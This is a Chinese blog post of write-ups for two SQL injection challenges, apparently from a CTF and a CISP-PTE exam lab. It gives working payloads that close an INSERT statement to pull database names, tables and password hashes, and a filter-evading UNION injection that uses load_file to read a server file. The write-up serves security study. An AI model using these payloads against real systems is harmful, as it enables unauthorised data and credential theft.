SQL注入示例

已于 2024-02-19 23:55:33 修改
阅读量203 收藏 4
点赞数 4
分类专栏: 网络安全 文章标签: 数据库
于 2024-01-23 21:55:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72324806/article/details/135766971
版权
文章描述了如何利用SQL注入技术,如通过闭合标签和特殊字符绕过过滤,实现对文章发布系统中的数据插入,以及如何通过load_file函数读取外部文件。具体展示了两种攻击方法,包括在文章内容中嵌入SQL语句获取数据库信息和文件内容。
摘要由CSDN通过智能技术生成

 例一、SQL注入:文章发布系统

http://49.232.193.10:81/start/post.php

进入主页之后,首先尝试万能密码登录,由于无法登陆,接着尝试注册用户,然后发布文章,该页面对文章的内容有一定的过滤

// 代码过滤规则

while (strstr($sql,'--')) {
	$sql = str_replace("--", "", $sql);
}

while (strstr($sql,'#')) {
	$sql = str_replace("#", "", $sql);
}

然后会在页面的下面回显内容如下,其中第2~4位为文章题目、文章内容、作者

insert article1 value('3506C3EA-7F34-28C6-E467-BD2645DA5E1A','1','1','1234rfv')

并有回显点——“成功” 字样

619b8ec9b5854f5cad33f391e2704991.png

解题思路

1、让value通过 ')提前闭合(文章内容处),注意必须保证每一条都是四项内容
2、由于文章是使用插入一条数据的值,value(标题,内容,用户名)到数据库,可以同时插入两条内容:(标题,内容,用户名),(标题,内容,用户名)—— 使得第一条闭合,然后在第二条里面插入自己想要的语句

3、最后通过查看文章发表页面获得回显的内容

首先将它变为两条语句:第一条是正常的文章发表语句,第二条是要获得回显的语句
1','1234rfv'),('123456','2','3  

查询数据库名
1','1234rfv'),('1',database(),'select version() 

union联合查询数据库下的表名
1','1234rfv'),('1',(select group_concat(table_name) from information_schema.tables where table_schema='2web'),'3

查询列名
1','1234rfv'),('1',(select group_concat(column_name) from information_schema.columns where table_name='users1'),'3

查询字段
1','1234rfv'),('1',(select password from users1 limit 0,1),'3

最后依次使用 limit(0,1)、limit(1,1)、limit(2,1)、limit(3,1) 切割查看所有的字段,结果均为:81dc9bdb52d04dc20036dbd8313ed055        (或者使用burp依次遍历)

flag{81dc9bdb52d04dc20036dbd8313ed055}

例二、基础SQL注入:load_file读文件

568b46ff3f1d411e8fbd6ce73a46196d.pngCISP-PTE 认证考试

首先是有单引号和括号的,首要是要闭合,然后回显点是在-1的位置,读取文件上面的key的话使用的是load_file('/tmp/360/key')

id=-1')%09ununionion%09select%091,2,3,load_file('/tmp/360/key')#

首先闭合,然后%09绕过空格,双写绕过关键字,load_file('/tmp/360/key')下载文件

 

 

 

 

 

Nosery
关注
专栏目录
SQL 注入-盲注
Cwillchris的博客
06-04 330
超详细盲注原理讲解
SQL注入原理以及Spring Boot如何防止SQL注入(含详细示例代码)
12-29
SQL注入是一种严重的安全威胁,它允许攻击者通过在应用程序的输入字段中插入恶意SQL代码来执行未经授权的数据库操作。攻击者通常寻找没有适当验证和过滤的用户输入,然后利用这些漏洞来构造能改变原始SQL语句意图的...
Sql注入示例
我想我是海 冬天的大海 心情随风轻摆
05-19 1279
Sql注入是我们经常听说的,具体极大的风险性,下面给一个比较直观的示例
SQL注入漏洞原理及注入示例
m0_62480631的博客
03-10 2116
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询等操作。用户可以修改参数或数据,传递给服务端,导致服务端拼接了伪造的SQL查询语句,并将伪造的SQL语句发送给数据库服务端执行,数据库将SQL语句的执行结果,返回给服务端,服务端又将结果返回给客户端,从而获取到敏感信息,甚至危险的代码或系统指令。
【常见开发问题】SQL注入示例及防范措施介绍
Lydia233的博客
05-26 649
SQL注入示例及防范措施介绍 文章目录SQL注入示例及防范措施介绍一、SQL注入简介二、SQL防注入方法三、总结 一、SQL注入简介 SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句传递给Web服务器,进而传给数据库服务器以执行数据库命令。其根本原因是开发人员创建动态数据库查询语句时拼接了来自客户端不可信的输入。SQL注入攻击能够读取数据库中的敏感数据,修改数据库(插入/更新/删除)数据,执行数据库管理员的操作(比如关闭DBMS),还能使用DBMS上存在的文件去覆盖数据
SQL注入漏洞检测
Kali与编程
12-10 1430
SQL注入漏洞是一种常见的安全漏洞,渗透测试工程师需要掌握SQL注入漏洞的检测技术,以便在测试中及时发现和利用漏洞。常见的注入点包括GET参数、POST参数、Cookie、HTTP头部信息和用户名密码等,常见的注入方式包括基于错误的注入、基于联合查询的注入、基于布尔盲注的注入、基于时间盲注的注入和基于报错盲注的注入等。本文将从渗透测试工程师的角度,详细介绍SQL注入漏洞的检测基础,包括常见的注入点、注入方式、手工注入和自动化注入等。常见的SQL注入技术包括基于错误的注入、基于时间的注入、联合查询注入等。
mybatis #和$的区别及$的sql注入示例
qq_41516802的博客
07-27 492
关于mybatis的#和$的区别,以及$产生sql注入的小例子
MyBatis中sql注入
qq_62965575的博客
12-19 613
${}和#{}的区别 sql注入 底层 jdbc类型转换 单个简单类型的参数 $ 不防止 Statement 不转换 value # 防止 preparedStatement 转换 任意 结论:除模糊匹配外,杜绝使用${}
防止SQL注入
u014644574的博客
04-27 2047
防止SQL注入
Sql注入简单示例和原理
2301_79448933的博客
04-11 574
当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。因为1=1为永真式,所以就能够查询到全部的数据。当你在xx后面加上' or 1=1#时候,能查询到数据库所有信息。当你输入个xx时,会发现username不存在,即不在数据库里面。本来输入的vince,将&sname都替换了。你会发现刚好vince在这个数据库里面,并且有id 和邮箱。后来输入的xx' or 1=1#
php防止sql注入示例分析和几种常见攻击正则表达式
12-19
SQL注入是一种常见的网络安全威胁,它允许攻击者通过输入恶意的SQL语句来操纵数据库,获取、修改或删除敏感数据。在PHP中,防止SQL注入是非常重要的。以下是对标题和描述中涉及的知识点的详细说明: 1. **自定义...
SQL注入示例,渗透测试参考
05-07
jsp脚本,sql注入示例,渗透测试
sql注入之手工注入示例详解
09-10
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的参数直接构造SQL查询语句时。手工注入是指不依赖自动化工具,而是通过手动构造和尝试不同的SQL语句来探测和利用这种漏洞。本文将深入讲解如何进行...
实用SQL小总结
UntifA的博客
09-29 1365
SQL记录
MySQL之复合查询与内外连接
zdlynj的博客
09-30 1231
前面我们讲解的mysql表的查询都是对一张表进行查询,即数据的查询都是在某一时刻对一个表进行操作的。而在实际开发中,我们往往还需要对多个表同时进行查询。我们这里使用的测试表,为雇员信息表(来自Oracle 9i的经典测试表):EMP员工表,DEPT部门表,SALGRADE工资等级表。
点评项目-2-完善注册登录业务
m0_75138009的博客
09-29 591
需要处理的业务:在网页发送 /user/code 路径下的 post 请求后,我们需要检验手机号后,向合法的手机号发送一个随机生成的电话号。
Spring的热部署工具和数据库密码加盐操作
2301_77053417的博客
09-28 820
加密过程:用户输入的密码+盐值 --> 字符串1,然后使用md5对字符串1加密得到字符串2,然后字符串2+盐值 --> 字符串3,这个字符串3就是存储在数据库中的密文。背景:如果我们的密码明文存储在数据库中,要是被窃取了是非常的危险的,所以我们在数据库中存储的密码不能是明文的,需要进行加密后存储,也就是数据库中存储的是密文。解密过程:取出数据库中的盐值和用户输入的密码得到字符串1,使用md5对字符串1加密得到字符串2,然后验证字符串2和数据库中的密文即可。做好以上的步骤,你项目中的热部署就已经做好了。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
最新发布
qq 117791303
10-02 290
Wintergrasp 冬拥湖 120 VS 120
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Nosery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值